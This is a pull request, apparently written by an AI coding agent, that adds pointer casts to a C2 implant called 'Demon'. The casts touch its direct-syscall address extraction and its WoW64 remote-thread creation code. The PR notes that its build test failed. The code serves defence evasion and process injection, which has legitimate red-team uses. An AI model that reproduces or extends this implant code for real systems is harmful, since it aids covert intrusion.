### PR TITLE
Cast syscall and context pointers for WoW64 compatibility

### DIFF
--- a/payloads/Demon/src/core/Syscalls.c
+++ b/payloads/Demon/src/core/Syscalls.c
@@ -36,7 +36,7 @@ BOOL SysInitialize(
 #if _M_IX86
     if ( IsWoW64() )
     {
-        Instance->Syscall.SysAddress = __readfsdword(0xC0);
+        Instance->Syscall.SysAddress = C_PTR( __readfsdword( 0xC0 ) );
     }
 #endif
 
@@ -150,7 +150,7 @@ BOOL SysExtract(
 #if _M_IX86
                 if ( IsWoW64() )
                 {
-                    *SysAddr = __readfsdword(0xC0);
+                    *SysAddr = C_PTR( __readfsdword( 0xC0 ) );
                     Success  = TRUE;
                     break;
                 }

--- a/payloads/Demon/src/core/Thread.c
+++ b/payloads/Demon/src/core/Thread.c
@@ -183,7 +183,7 @@ HANDLE ThreadCreateWoW64(
     }
 
     PUTS( "calling RtlCreateUserThread( ctx->h.hProcess, NULL, TRUE, 0, NULL, NULL, ctx->s.lpStartAddress, ctx->p.lpParameter, &ctx->t.hThread, NULL ) on x64 context" )
-    if( ! pExecuteX64( pX64function, &ctx ) )
+    if( ! pExecuteX64( pX64function, (DWORD)U_PTR( &ctx ) ) )
     {
         NtSetLastError( ERROR_ACCESS_DENIED );
         PUTS( "ThreadCreateWoW64 failed" )


### PR DESCRIPTION
## Summary
- Cast FS segment reads to pointers when initializing or extracting syscall addresses
- Cast WoW64 context pointer before calling ExecuteX64 to match expected DWORD parameter

## Testing
- `cmake .. && cmake --build .` *(fails: x86_64-w64-mingw32-gcc: not found)*

------
https://chatgpt.com/codex/tasks/task_e_68b1bba848d883229ff27c262ee8594c